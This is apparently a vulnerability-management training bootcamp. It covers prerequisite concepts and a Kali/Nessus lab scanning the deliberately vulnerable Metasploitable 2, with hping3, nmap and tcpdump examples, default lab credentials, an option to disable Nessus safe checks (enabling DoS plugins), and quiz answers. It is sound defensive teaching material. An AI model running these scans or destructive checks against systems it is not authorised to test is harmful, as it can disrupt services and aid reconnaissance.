Understand that when designing a network scanning architecture within an organization, the scanners themselves must be whitelisted on any firewalls in order that they can scan devices residing behind those firewalls.

Vulnerabilities

OWASP Top 10 - Have some familiarity with and be able to define some of the vulnerabilities on this list (especially XSS, CSRF and SQLi). It may help to understand the different types of XSS (i.e. stored, reflected and DOM-based.)
CWE Top 25 - Have some familiarity with the vulnerabilities on this list.
NVD - Know what NVD is and the general composition of a CVE/vulnerability.
CIA Triad - Understand what Confidentiality, Integrity and Availability mean and how they relate to vulnerabilities.

Vulnerability Management

Shellsharks VM Primer - Read and understand the VM lifecycle (i.e. identifying, classifying, analyzing, prioritizing, reporting, remediating and mitigating vulnerabilities).
Rapid7’s Definition of VM - Read and be able to define VM in your own words.
Tenable’s Definition of VM - Read and be able to define VM in your own words.
Continuous Vulnerability Management - Download the CIS controls doc and skim the sub-controls for CIS Control 3.
CIS Secure Configuration Benchmarks - Know what the CIS Benchmarks are at a high-level.

VM Tools

Tenable Suite - Know what Nessus, tenable.sc and tenable.io are.
Tenable Nessus - Nessus is Tenable’s network/endpoint scanning tool. The free version of this tool is covered in the bootcamp lab.
Qualys - Another network scanning tool.
Rapid7 Nexpose - …and another network scanning tool.
OpenVAS - An open-source scanning tool that has a shared history with Nessus.
Collectively, it is good to just be familiar with what tools are out there in the VM space. There really should be no expectation that you are an expert or have even used all of these.

Risk Analysis

CVSS - Understand how scores are calculated using the various CVSS metrics (e.g. base, temporal, environmental, etc…)
Understand common mitigating/compensating controls (e.g. antivirus, IPS, application whitelisting, non-administrative accounts, etc…) The 20 CIS Controls are a good place to get a better understanding of some of these controls and how they reduce residual risk.
The 5 Risk Mitigation Methods - Accept, Avoid, Control, Transfer, Monitor.
Quantitative vs Qualitative Risk Analysis - Be able to do simple analyses using both of these methodologies.

Compliance/Regulatory Frameworks

*You need only have a high-level understanding of each of the following frameworks. Be able to describe what they are at a minimum.
NIST 800-53 - Be familiar with some of the controls and at a high-level what this document is.
NIST CSF - Identify, Protect, Detect, Respond, Recover.
PCI - Compliance standards for merchants who accept credit card payments.
ISO 27001 - Industry framework detailing security requirements for information security management systems (ISMS)
HIPAA - Framework for protecting sensitive patient health information (PHI).

REST APIs & Scripting

Python - Popular programming language. This is my recommended language for those getting into infosec.
Learn a little Python - I recommend being familiar enough with Python that you could comfortably list it on your resume. This goes a long way in terms of standing out in an interview.
REST - REST APIs are built into a lot of different security tools. Knowing what they are and how to use them is an invaluable skill and one that would really help you stand out in an interview.
Writing against REST APIs in Python - Some information on how exactly to programmatically use a REST API using Python.
Github - I recommend creating a Github account, writing a simple script or two (in Python for example) and making it publicly available on your Github. This will demonstrate to prospective employers your knowledge of scripting. An example of a possible script you could write will be covered in the bootcamp lab.

Regex

Regex Tutorial - Regex is used quite a bit in infosec. I recommend you know what it is so you can speak to it in an interview if necessary.
Regex Tester(s) - regexr, regex101, regextester are handy tools when testing out Regex queries you have built.

VM Bootcamp Lab

Alright! If you’ve made it this far, you’re comfortable enough with the recommended pre-reqs and are ready to get into the hands-on portion of the bootcamp. The goal of these exercises is to give you real-world, practical experience you can reference on a resume. This should give you the credit and confidence needed to show well in a VM interview. To get started, I’ve provided a list of what you will need to accomplish the bootcamp exercises. At the end of each lab exercise, there will be a series of questions designed to help test your knowledge and understanding.

What You’ll Need

An Internet-accessible compute environment (e.g. computer, AWS, Azure, etc…) capable of running two virtual machines.
If using a traditional computer, you’ll need a virtualization hypervisor tool such as VMware, VirtualBox, or Parallels.
A Linux VM (use a distribution of your choice - I personally recommend Kali Linux or Ubuntu). *The lab exercises will be done using Kali.
A free license key for Nessus Essentials.
A copy of Metasploitable 2.

Bootcamp Lab Exercises

Exercise 0: Lab Setup
Exercise 1: Network Tools Primer
Exercise 2: Discovery Scanning
Exercise 3: Vulnerability Scanning
Exercise 4: Scanning Enrichment
Exercise 5: Reviewing/Analyzing Results
Exercise 6: Reporting
Exercise 7: Scripting & Automation
Bootcamp Lab Exercise Answers

Exercise 0: Lab Setup

First, let’s get our lab environment set up so we can proceed through the bootcamp exercises.

To start, we need to download a virtualization hypervisor such as VMware, VirtualBox, or Parallels. I will be using VMware Fusion during the exercises.
Once the virtualization tool is downloaded and installed, we need to acquire a VM which will host our scanning tool and effectively be the scanner host. For this, I recommend a Linux variant such as Kali Linux or Ubuntu. I will be using Kali (64-bit) throughout the exercises. Offensive Security actually maintains VMware and VirtualBox-specific Kali images which I recommend using.
*If you’ve downloaded the pre-configured .vmwarevm from Offensive Security, you can simply double-click the (un-zipped) file and it should open up in VMware with no other setup required.
Otherwise, once we have downloaded the VM, we need to unpack, install and perform the initial setup of the VM within our virtualization tool. Here is a guide for installing Kali inside VMware. When asked to name the VM, give it an appropriate name such as “Scanner”. I recommend giving it as much RAM and CPU as you can spare. Scanning can be somewhat resource-intensive so the more power the VM has the better. Keep in mind, you will also need to run a second VM simultaneously so don’t spend all your computer’s resources in one place! The pre-configured .vmwarevm image from Offensive Security has 2GB RAM, and 80GB virtual hard drive, I think this is sufficient for this exercise.
To start, have the VM configured in NAT mode (a.k.a. “Share with my Mac” on Mac devices). This is to ensure that the Kali VM is able to download updates and additional tools needed for the bootcamp exercises.
To initially get into our Kali instance, use the credentials kali / kali. I recommend immediately changing your kali user password. Here is a guide on how to change a Linux password. Once this is done, run sudo apt-get update and then sudo apt-get upgrade (typing “Y” to confirm the upgrade) to update your system tools to the latest versions. This may take a few minutes to complete.
Now that our scanner VM base image is set up and ready to go, we need to register for a Nessus Essentials activation code. Once submitting your registration, you should receive an email from no-reply@tenable.com with your License key and a button-link to download Nessus.
Within Kali, open the Nessus download link which will take you to the Nessus downloads page. Find the Nessus-[current.version]-debian[X]_amd64.deb Nessus binary (which is suited for Debian 9, 10 and a variety of Kali Linux versions). Click “I Agree” on the License Agreement and save the file directly to your Kali host.
To install Nessus, follow the appropriate guide Tenable has provided. If you are using Kali, use this guide. Navigate to the directory you downloaded the Nessus binary to and run the following command.

sudo dpkg -i Nessus-<version number>-debian6_amd64.deb

Once installed, start the Nessus scanner service nessusd by running…

sudo service nessusd start

…and then verify it is running using the following command…

sudo service nessusd status

Now, you can navigate to https://kali:8834/. You may need to click through a certificate-related security warning within the Kali browser.
Once on the Nessus web-server, you should see a wizard for installing a variety of different Nessus versions. Select “Nessus Essentials” and proceed with installing Nessus using this guide. The installation may take some time as it needs to download and compile a large database of Nessus plugins.
While Nessus initializes, let’s make sure we have all the other utilities needed for the lab exercises. We’ll need to ensure we have Nmap, tcpdump, hping3, ping and traceroute. Kali Linux comes with all of these tools so no additional setup is needed.
The target system we will be scanning with our Nessus-infused Kali machine will be a Metasploitable 2 VM. This VM can be downloaded here. Once downloaded and un-zipped, you can double-click on the Metasploitable.vmx file to have it open directly in VMware.
With Metasploitable running, login to the system (defaults creds are msfadmin / msfadmin) and run ifconfig to see what the IP address is. Similarly, get the IP address of your kali instance by running ipconfig locally on that machine. With both IPs in-hand, you can test connectivity between them using the following command. Be sure to test connectivity in both directions! You’ll know if the connection is working if you see “1 packets transmitted, 1 received…” in the output from the command below.

ping -c 1 TARGET_IP

For more info and tips on Metasploitable, check out this guide by HD Moore.

Exercise 0 Questions

Question 0.1

What are the default credentials for Kali and Metasploitable 2? How would you change a user’s password on either of these systems? –> Answer

Question 0.2

How can you update Kali Linux? –> Answer

Question 0.3

What is Network Address Translation? –> Answer

Question 0.4

In what ways can you interact with (e.g. start, stop, restart, check status of) system services (such as nessusd) on Linux? –> Answer

Question 0.5

What is the default number of ICMP requests made by the Linux ping utility (e.g. ping 172.16.84.2)? –> Answer

OK! We have now finished the lab setup exercise. Let’s move on to the next step.

Exercise 1: Network Tools Primer

Before we proceed to the scanning sections of the lab, let’s take a quick sojourn into a few basic network utilities and how we would use them for basic VM engineering and troubleshooting.

Network Tools

tcpdump
ping
hping3
traceroute
Nmap

tcpdump

Tcpdump is an excellent tool for network troubleshooting, something you may find yourself doing quite a bit as a VM analyst/engineer. I won’t cover Tcpdump in-depth but I think this guide by Daniel Miessler is worth reading. I recommend going through at least the first six sections of that writeup (up to “Show Traffic by Protocol”). Let’s go through a quick exercise to demonstrate the power of Tcpdump.

On your Kali instance, open two terminal windows side-by-side. In one terminal window, run the following tcpdump command. You will need to run it as root for it to work. Replace METASPLOITABLE_IP with the IP of your Metasploitable 2 instance.

sudo tcpdump -i eth0 -n host METASPLOITABLE_IP

…in the second terminal window, run the following hping3 command (we’ll cover hping3 in more detail shortly) What this command does is send a single TCP SYN to port 22 on the Metasploitable system.

sudo hping3 -p 22 -S -c 1 METASPLOITABLE_IP

What you’ll see as the immediate output of this command is shown below… Essentially, hping3 is letting us know that it sent the SYN (as denoted by the “-S” in the hping3 command) and received a SYN/ACK (as denoted by the “…flags=SA…”) from the Metasploitable box. Great!

HPING 172.16.84.3 (eth0 172.16.84.3): S set, 40 headers + 0 data bytes
len=46 ip=172.16.84.3 ttl=64 DF id=0 sport=22 flags=SA seq=0 win=5840 rtt=11.8 ms

--- 172.16.84.3 hping statistic ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 11.8/11.8/11.8 ms

Moving back to the tcpdump window we see the following output. From this output, we can see the initial SYN (as denoted by the “S” flag in Flags [S]), sent from our Kali instance to the Metasploitable system. Then, we see two records after that, one with the flags “[S.]” and another with the flags “[R]”. The second record is the response SYN/ACK from the SSH service listening on the Metasploitable system. The third record is hping3 gracefully closing out the connection with an RST.

listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
44:11.987603 IP 172.16.84.2.1662 > 172.16.84.3.22: Flags [S], seq 2133837101, win 512, length 0
44:11.988190 IP 172.16.84.3.22 > 172.16.84.2.1662: Flags [S.], seq 1870315893, ack 2133837102, win 5840, options [mss 1460], length 0
44:11.988206 IP 172.16.84.2.1662 > 172.16.84.3.22: Flags [R], seq 2133837102, win 0, length 0

As you can see, there is more than meets the eye when it comes to network traffic and tool output. Tcpdump is a great way for us to see exactly what is happening “under the hood”. I highly encourage you to open up Tcpdump and capture traffic in a variety of different situations - troubleshooting, trying out a new tool, etc… You will learn a lot about how a tool works by inspecting the traffic it generates.

ping

There’s not much to discuss with ping but it is worth mentioning here in the event that you are unfamiliar with what it is and how to use it. ping is a routinely used tool for diagnosing network connections. It sends an ICMP echo request and expects an ICMP echo reply. If you get a reply, this means the target IP is routable (at least using ICMP) and if you don’t get the reply, it may not be routable. The command below demonstrates a ping from my Kali box to the Metasploitable box.

ping -c 1 172.16.84.3   
PING 172.16.84.3 (172.16.84.3) 56(84) bytes of data.
64 bytes from 172.16.84.3: icmp_seq=1 ttl=64 time=0.537 ms

--- 172.16.84.3 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.537/0.537/0.537/0.000 ms

ping is typically one of the first things I will try when troubleshooting network connectivity. Keep in mind! The absence of an ICMP echo reply though does not necessarily mean a machine is not routable.

hping3

hping3, similar to the classic ping utility is a network tool built for troubleshooting - but really has much more functionality. Using hping3 you can custom-build ICMP, UDP and TCP packets to an exact specification and then fire them off to test firewalls, perform port scanning, fingerprint OS’s and a lot more. hping3 is similar in some ways to Nmap but much lighter-weight which makes it particularly good for quick troubleshooting.

To get started, I recommend reviewing the hping3 “man page” to get a better idea of its capabilities and the flags required to invoke different functionality.

OK, now let’s get an idea of the listening services on the Metasploitable box. We can do so by running “netstat -tulpn” on the Metasploitable host.

From the output of the netstat command, we can see there are quite a few listening services. Moving over to the Kali scanner host, we can use the hping3 command below to verify whether services are reachable from our scan host. The command below demonstrates that TCP port 53 on the Metasploitable is responding to SYN packets from our scanner host.

sudo hping3 -S -c 1 -p 53 172.16.84.3   
HPING 172.16.84.3 (eth0 172.16.84.3): S set, 40 headers + 0 data bytes
len=46 ip=172.16.84.3 ttl=64 DF id=0 sport=53 flags=SA seq=0 win=5840 rtt=3.5 ms

--- 172.16.84.3 hping statistic ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 3.5/3.5/3.5 ms

I encourage you to explore other options and functionality of the hping3 tool and think of other ways you might be able to use it for basic scanning, troubleshooting, etc…

traceroute

traceroute (or tracert on Windows) is a simple network utility which tracks the route packets take on an IP network to a destination host. This handy tool is useful when diagnosing routing failures which may exist between a scan host and the target host.

This short exercise will demonstrate the route a network packet takes from your Kali system to your actual router/gateway. First, figure out the IP address of your router. An easy way to do this may be to just run ipconfig/ifconfig, figure out your parent host IP address and then change the fourth octet to a “1”. For example, if your parent host IP is 192.168.1.39, your router’s IP may likely be 192.168.1.1. OK, with your router IP address in-hand, go back to your Kali system and try the following traceroute command. Replace 192.168.1.1 with the IP address of your router.

traceroute 192.168.1.1
traceroute to 192.168.1.1 (192.168.1.1), 30 hops max, 60 byte packets
 1  172.16.84.1 (172.16.84.1)  0.311 ms  0.179 ms  0.110 ms
 2  192.168.1.1 (192.168.1.1)  1.359 ms  1.291 ms  1.241 ms

Here you will see that in order for the packet to reach its destination (the router IP), it had to traverse the IP 172.16.84.1 which is the internal gateway for your virtualized host. On my parent host machine, this is the bridge100 VMware interface (which can be seen by running ifconfig on the parent host).

bridge100: flags=8a63<UP,BROADCAST,SMART,RUNNING,ALLMULTI,SIMPLEX,MULTICAST> mtu 1500
	options=3<RXCSUM,TXCSUM>
	ether 02:3e:e1:2c:ad:64
	inet 172.16.84.1 netmask 0xffffff00 broadcast 172.16.84.255

If I was unable to reach the router with traceroute, the culprit could very likely be this intermediary router. Don’t stop here though, think of some other things you can trace!

Nmap

Finally, let’s take quick peek at Nmap. Nmap is a very full-featured network exploration, scanning and security auditing tool. It can scan multiple hosts at a time, perform service fingerprinting and enumeration and even run custom-built scripts which can audit the security of target hosts and even perform exploitation of vulnerabilities. It is a powerful tool, but you need only have a limited understanding of it’s feature-set to aid you in every-day VM engineering/analyst responsibilities.

For this exercise, let’s just do a quick full-port-scan of the Metasploitable host from our Kali scan host. As usual, I first recommend reviewing the features and flags of Nmap by running “man Nmap”. Now, let’s run a simple, plain Nmap scan of the Metasploitable host using the command shown below.

sudo nmap 172.16.84.3
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-21 09:45 EDT
Nmap scan report for 172.16.84.3
Host is up (0.0027s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
512/tcp  open  exec
513/tcp  open  login
514/tcp  open  shell
1099/tcp open  rmiregistry
1524/tcp open  ingreslock
2049/tcp open  nfs
2121/tcp open  ccproxy-ftp
3306/tcp open  mysql
5432/tcp open  postgresql
5900/tcp open  vnc
6000/tcp open  X11
6667/tcp open  irc
8009/tcp open  ajp13
8180/tcp open  unknown
MAC Address: 00:0C:29:4B:79:E4 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.32 seconds

From this scan, we can see there is a bevy of listening services. COOL! As a VM analyst you may use this to quickly diagnose whether a port is open. This is quicker than running a network scan from a traditional vulnerability scanner.

Exercise 1 Questions

Question 1.1

What protocol does Kali use when you run traceroute against your Metasploitable host? (TIP: Try using tcpdump to investigate.) –> Answer

Question 1.2

What port does ping use? –> Answer

Question 1.3

How can you send a UDP packet to port 69 (of the Metasploitable box) using hping3? What is returned from Metasploitable as a result of this packet? Why is this the response? –> Answer

Question 1.4

When using traceroute targeting your home router, what is the TTL of the first packet sent by traceroute? What is returned in response to this packet and from what device? –> Answer

Question 1.5

By default what ports does Nmap scan? How can you configure Nmap to scan all ports? –> Answer

Exercise 2: Discovery Scanning

Alright, so we have our lab setup and we have some familiarity with basic network utilties. Let’s begin the network scanning portion of the lab with the typical Step 1, Discovery Scanning. Typically, prior to performing deeper vulnerability scans you want to first gather an inventory of in-scope devices on your target network. For the lab, we are focusing most of our targeted efforts at the Metasploitable box, but for this exercise, we can (if you would like) expand the scope of our scanning to include other devices on your home network. Follow the steps below to get started…

On your Kali machine, log into the Nessus web interface. You can do this by opening up Firefox in Kali and navigating to the URL https://127.0.0.1:8834/.
Create a new scan by clicking the “New Scan” button in the top right corner of the Nessus interface.
Click the “Host Discovery” section of the “Scan Templates” menu.
Within the scan creation wizard, give the scan an appropriate name (such as “Discovery Scan”).
Populate the “Targets” section of the scan wizard with the IPs you wish to scan. For this, at a minimum, input the IP of your Metasploitable host. Optionally, you can choose to put in the class-C subnet that your home network uses (likely something similar to 192.168.1.0/24).
Click the “Save” button at the bottom of the scan creation wizard.
Click the “Play” button at the right hand side of the scan record on the main Nessus interface. This will run the scan.
Give the scan a few minutes to complete.
Once the scan completes, click anywhere on the record to open up the scan results.
Within this view, you can see the IPs found, and any vulnerabilities/plugins that were identified during the scan.

Congrats! You just performed a discovery scan with Nessus! One important thing to keep in mind with the free version of Nessus is that though there is no limit on the devices you can discover with Nessus, you will only be able to perform vulnerability scanning against a max of 16 target systems.

Exercise 2 Questions

Question 2.1

By default, what “ping methods” are used by a Nessus host discovery scan. –> Answer

Question 2.2

What are the two Nessus plugins triggered by the Nessus host discovery scan? –> Answer

Question 2.3

Does the host discovery scan perform “Credentialed checks”? How can you confirm this within Nessus? –> Answer

Question 2.4

What ping method was successful in identifying the live Metasploitable host? –> Answer

Exercise 3: Vulnerability Scanning

OK, now that we’ve discovered our target system(s), we now move into the actual vulnerability scanning portion of our VM lifecycle. Tools like Nessus are purpose built with an expansive set of detection plugins to find, classify and even risk-rank vulnerabilities. Network scanning tools have a number of different methods for detecting vulnerabilities, two of these methods are credentialed and uncredentialed scanning. Ideally, where possible, you want all scans to be credentialed. Credentialed scans have higher-fidelity results (less false-positives) and they also find more issues overall. With that said, you won’t always have credentials for a target so you may have to settle for an uncredentialed scan. These two types of scans also function a little differently. Credentialed scans will actually “physically” login to a target system and enumerate vulnerabilities by running commands directly on the system. Uncredentialed scans on the other hand, are unable to login to the target system and must instead rely on anonymous/remote fingerprinting mechanisms to detect potential vulnerabilities. Let’s run through a pair of exercises for configuring and running an uncredentialed and credentialed scan respectively.

Uncredentialed Scan

Create a new scan by clicking the “New Scan” button in the top right corner of the Nessus interface.
Click the “Basic Network Scan” section of the “Scan Templates” menu.
Within the scan creation wizard, give the scan an appropriate name (such as “Uncredentialed Scan”).
Populate the “Targets” section of the scan wizard with the IPs you wish to scan. For this, input the IP of your Metasploitable host.
Click the “Save” button at the bottom of the scan creation wizard.
Click the “Play” button at the right hand side of the scan record on the main Nessus interface. This will run the scan.
Give the scan a few minutes to complete. It will take a little longer than the host discovery scan.
Once the scan completes, click anywhere on the record to open up the scan results.
Within this view, click on the “Vulnerabilities” tab and you will be able to view all vulnerabilities/plugins that were identified during the scan.

As you can see, the uncredentialed scan yields A LOT more plugins being returned and plenty of vulnerabilities found. (Remember, there were only two plugins found during the discovery scan.)

Credentialed Scan

Create a new scan by clicking the “New Scan” button in the top right corner of the Nessus interface.
Click the “Basic Network Scan” section of the “Scan Templates” menu.
Within the scan creation wizard, give the scan an appropriate name (such as “Credentialed Scan”).
Populate the “Targets” section of the scan wizard with the IPs you wish to scan. For this, input the IP of your Metasploitable host.
Click on the “Credentials” tab of the scan creation wizard and then click “SSH”.
In the right-hand pane change the “Authentication method” drop-down to “password” and then set the “Username” and “Password” text-fields each to msfadmin.
Click the “Save” button at the bottom of the scan creation wizard.
Click the “Play” button at the right hand side of the scan record on the main Nessus interface. This will run the scan.
Give the scan a few minutes to complete.
Once the scan completes, click anywhere on the record to open up the scan results.
Within this view, click on the “Vulnerabilities” tab and you will be able to view all vulnerabilities/plugins that were identified during the scan.

As you can see from the image below, and as-predicted (compared to the screenshot of the uncredentialed scan results), there are far more findings with the credentialed scan.

Well done! We should now have plenty of vulnerability data to work with for the rest of the exercises in the lab.

Exercise 3 Questions

Question 3.1

What different severities does Nessus report for vulnerabilities? –> Answer

Question 3.2

Given just the uncredentialed scan, what is the most severe vulnerability according to Nessus? Why has Nessus given this vulnerability this rating? –> Answer

Question 3.3

Now, according to the credentialed scan results, what is the most severe vulnerability according to Nessus? Why does this vulnerability have a higher VPR severity score than the previously identified vulnerability? –> Answer

Question 3.4

Using what plugin(s) can we validate that the credentialed scan was successful in logging into the target system. –> Answer

Question 3.5

The credentialed scan was successful in logging into the target Metasploitable system, but had some issue performing everything it was trying to accomplish. What happened here? –> Answer

Exercise 4: Scanning Enrichment

Setting up vulnerability scans is an important first step for a VM professional, but you shouldn’t stop there. There are always improvements and advancements that can be made within scanning operations or the VM program as a whole. These improvements can help alleviate time spent on manual tasks, reduce MTTR, improve the fidelity of reports or even increase the overall effectiveness of your scans. The challenge in VM is that of scale. How can we scan a lot of systems and triage/resolve an even greater number of vulnerability findings with limited resources? The answer is usually coupling automation with robust prioritization. Below are just a few quick exercises that demonstrate some improvements we can make just within Nessus itself. Keep in mind, when working in an enterprise VM program you will have tools that have VM enrichment capabilities far beyond what Nessus Essentials can offer.

For each of the sub-exercises below, first follow these steps.

Open your credentialed scan results by clicking on the record on the Nessus main page.
Click on the “Configure” button to edit the scan configuration.

Automation & Scheduling

Click on the “Schedule” side-tab under the “Basic” section within the configuration wizard.
Toggle “Enabled”. Here you can set a time for the scan to begin as well as an interval for that scan to run on.

Scheduled scans are ideal as you may not want to scan certain devices during business hours. Automated, recurring scans mean one less thing a VM professional has to perform manually. Combined, scheduled + recurring scans are an obvious advancement to be made to routine VM operations.

Notifications & Filters

Click on the “Notifications” side-tab under the “Basic” section within the configuration wizard.
In the “Email Recipient(s)” field you can provide email addresses for those who need to receive alerts on specific vulnerabilities.
In the “Result Filters” area, we can add filters such that notifications are sent only when certain criteria are met.
*For example, we may be interested in seeing alerts on all “Critical” risk vulnerabilities that are known to have an exploit available. We can create these two filters using the following filter-sets.
- Match All of the following:
- Exploit Available is equal to true
- Severity is equal to Critical

Most vulnerabilities will likely be addressed through the standard patching process which is governed by SLAs created in coordination between the VM team and the respective IT organization. There are however, some vulnerabilities that may require more immediate analysis and mitigation. Using the notification/filter functionality, we can create alerts which will notify us the instant a vulnerability which meets this urgent criteria is discovered. At which point, we can immediately being to address that finding.

Reporting

Click on the “REPORT” section within the “Settings” tab.
Uncheck the box for “Show missing patches that have been superseded”

Toggling this setting will help us remove false-positives from our Nessus reports. This is somewhat self-explanatory. Basically, if a system has a patch which supersedes a missing patch, we don’t want any plugins to fire for the superseded patch. This will unnecessarily junk up the report with vulnerabilities that are not actually there.

Advanced

Click on the “ADVANCED” section within the “Settings” tab.
Change the “Scan Type” drop-down to “Custom”.
Click on the “General” section below the “Advanced” pane on the left-hand side.
Uncheck the “Enable safe checks” box within the “General Settings” pane.

This setting should only be disabled under great caution. Disabling “Enable safe checks” will mean the scan can use certain plugins that are considered highly invasive. This includes destructive attacks, denial of service (DoS) and other kinds of floods. Though this scan can have negative side-effects on a target system, it also adds additional tests that weren’t otherwise being run. In this way, more potential issues can be identified.

Exercise 4 Questions

Question 4.1

Vulnerability scans can by nature be somewhat network-intensive. In the event that a host being actively scanned becomes unresponsive, something like Nessus could DoS the system even further. What can be configured within the scan to prevent this from happening? –> Answer

Question 4.2

What is the default user-agent for Nessus web application scanning. –> Answer

Question 4.3

What type of port scanning does Nessus perform by default? –> Answer

Exercise 5: Reviewing/Analyzing Results

Now that we have our vulnerability scans completed, it’s time to review the results and analyze the findings. Metasploitable is a “purposefully-vulnerable” machine and as such, is rife with issues. Though you may not encounter a system that is this bad in the real world, you certainly could find yourself reviewing a box that has many vulnerabilities on it. So let’s take this system, how should we go about analyzing these vulnerabilities? Below is one sequence that could occur…

OK, so there are a lot of vulnerabilities. We need to start filtering down to just the ones that are of highest importance.
Are there any vulnerabilities that are of imminent danger of being exploited? If so, are any of these vulnerabilities mitigated in any way due to other controls within the environment?
We can add a filter to see only exploitable vulnerabilities. We are now down to 12 vulnerabilities (this is 12 groups of vulnerabilities as some as you can see, are bundled).

That’s still a lot of vulnerabilities to take on at one time. Let’s filter this down a little bit more. We can do so by adding some additional filters. Let’s add a filter for only Critical severity issues as well as a filter for only plugins which are in the “Plugin Family”, Gain a shell remotely. These filters are shown in the image below…

After these filters have been applied, we have only a few remaining issues (5 total).

As a VM analyst who is reviewing these results, I would likely filter down to these findings and proceed with prioritization, reporting and remediation. For each of these findings, I would want to open them up, understand the plugin logic and perform cursory checks to determine whether they we’re false-positives or not. With credentialed scans though, hoping a finding is a false-positive is often just wishful-thinking. I encourage you to open each of these and to the best of your ability, analyze them to determine the validity of the finding. Specifically, is the vulnerability really exploitable?

(COMING SOON: Steps for reproducing manual validation of a vulnerability. Wasn’t ready in the 1.0 release.)

Exercise 5 Questions

Question 5.1

What is the CVSS vector for the Shellshock vulnerability? What does “AC:L” mean within that CVSS vector? –> Answer

Question 5.2

How did Nessus determine that Metasploitable was vulnerable to Shellshock? –> Answer

Question 5.3

What is the highest risk finding? –> Answer

Question 5.4

According to Nessus, what action (mitigation/patch) should be taken to reduce the most risk on the system? –> Answer

Exercise 6: Reporting

Once we have performed analysis on the findings, we need to deliver something to the appropriate place in order that the finding be mitigated. What I mean by this is that there are stakeholders who need to receive reports which detail these findings so that they can address them. Nessus reports are one way to do this. Creating a report is easy. Inside a scan result, we can click on the “Report” drop-down in the top right which reveals a number of different report formats available (.pdf, .html and .csv). We can click on any of these to generate that report. Try creating a “Custom”, and an “Executive Summary” report and see what is contained within each.

The image above illustrates the wealth of settings available when creating a “Custom” report with Nessus. I recommend you check all boxes, generate the report and then review that report to see what each of those boxes adds to the final product.

Exercise 6 Questions

Question 6.1

If we’re interested in generating a report for just Critical vulnerabilites. How can this be done? –> Answer

Question 6.2

Who all might be interested in receiving a vulnerability report from Nessus? (HINT: Think individual groups, stakeholders or other personnel within an organization.) –> Answer

Exercise 7: Scripting & Automation

To take Nessus, and really VM, to the next level, we need to step up our game in terms of automation. The best way to do that is by leveraging the Nessus API. The API documentation is available locally within your Nessus instance at “https://127.0.0.1:8834/api#/overview”. The API represents boundless opportunity for VM analysts/engineers to automate all manner of operational tasks, thus reducing overhead. I recommend those interested in not only VM but infosec at large, to become very familiar with APIs such as this and learn to write against them programmatically using a scripting language such as Python. To aid you in this journey there are frameworks, built by others in the community that can help you interact with these APIs. For the Nessus API, there is PyNessus, a Nessus REST API client which is fully Apache 2 licensed and built specifically for security auditors, pentesters and VM analysts.

As I mentioned, there are countless potential automation ideas that one could think of. One possible project would be to create a script that could kick off a scan against a target system. The use-case for this project would be as follows… As a VM analyst you may be asked by a system owner to re-scan a system following patch application. The system owner is interested in whether the patch has been successfully applied and thus the vulnerability is mitigated. Rather than wait for the next scan window, the system owner would like to know as soon as possible whether the vulnerability has been eradicated. Typically, a VM analyst would kick off a targeted scan of this system manually. But instead, what if you wrote a script that took one argument (a target IP) and auto-ran a scan of that system.

This bootcamp is not designed to be a course in Python and as such, will not cover in-depth how to create the script I detailed above. I recommend researching how best to programmatically interact with REST APIs. One good resource would be Python & APIs: A Winning Combo for Reading Public Data. With that said, I would like to provide this script myself so others may have an example to build off of and reference as they create other useful scripts of their own.

Example script is currently being developed. Stay tuned!

Finally, I’d like to list a few other potential script ideas that someone could work on if they were interested!

Building off the previous idea - a script that could auto-run a scan against a provided target but also take as input a Plugin ID and return true or false if that plugin is found within the results of that scan. Ultimately, the system owner is interested if a plugin has “fallen off” the report so rather than go into the scan results and see manually, why not have the result returned programmatically.
A script that can take a list of plugins as input and return all the hosts that have one or more of those plugins. In the event of a large patch release by a vendor, we may want to quickly see all the hosts affected by a set of plugins.
A script that will take an IP as input and return the last time it was scanned, how long the scan was and whether it was successfully scanned with credentials. This is a common question in the VM world. Take this scenario as an example - there may be some issue (system degradation) with a system and the owner is wondering if the scan itself is the culprit. The system owner may provide logs indicating some malfunction during a certain time and would like to blame the scan for the degradation. You may be able to quickly diagnose this using this script which will tell you when the scan was last performed. If the scan timing overlaps with when the system was experiencing a degraded state, it may very well be the scanners fault. Otherwise, we can rule out the scanner as being the cause. Alternatively, you may find that the results of the scan look a little off, and you’d like to quickly troubleshoot whether the last scan was with credentials. As we know, non-credentialed scans can introduce false-positives into the scan results.

Thanks for taking the time to work your way through these exercises and happy scriptin’!

Lab Exercise Answers

Exercise 0 Answers
Exercise 1 Answers
Exercise 2 Answers
Exercise 3 Answers
Exercise 4 Answers
Exercise 5 Answers
Exercise 6 Answers

Exercise 0 Answers

Answer 0.1

Kali credentials: kali / kali

Metasploitable 2 credentials: msfadmin / msfadmin

To change the password for the user you are logged in as, simply type passwd and go through the prompts. To change the password of another user, type sudo passwd OTHERACCOUNTNAME. This guide explains it very succintly.

Back to Question

Answer 0.2

sudo apt-get update && sudo apt-get upgrade

Back to Question

Answer 0.3

Network Address Translation, or “NAT”, is where local IP addresses are mapped to a single public IP address (and vice-versa) in order to provide Internet access to internally-situated hosts.

Back to Question

Answer 0.4

There are a number of different methods and utilities for interacting with system services on Linux. Some of these include the service command, []/etc/init.d/service](https://www.geeksforgeeks.org/what-is-init-d-in-linux-service-management/) and systemctl.

Back to Question

Answer 0.5

Somewhat of a trick question. Linux will endlessly send ping requests until it is stopped.

Back to Question

Exercise 1 Answers

Answer 1.1

UDP! You can determine this by running the tcpdump command shown below…

tcpdump -i eth0 -n host [METASPLOITABLE_IP]

…then running traceroute against your Metasploitable host. In the tcpdump output, you will see a number of UDP datagrams being sent to a variety of different ports (shown below). Interesting!

listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
13:55.430855 IP 172.16.84.2.33737 > 172.16.84.3.33434: UDP, length 32
13:55.430945 IP 172.16.84.2.57603 > 172.16.84.3.33435: UDP, length 32
13:55.430996 IP 172.16.84.2.57344 > 172.16.84.3.33436: UDP, length 32
13:55.431062 IP 172.16.84.2.44554 > 172.16.84.3.33437: UDP, length 32
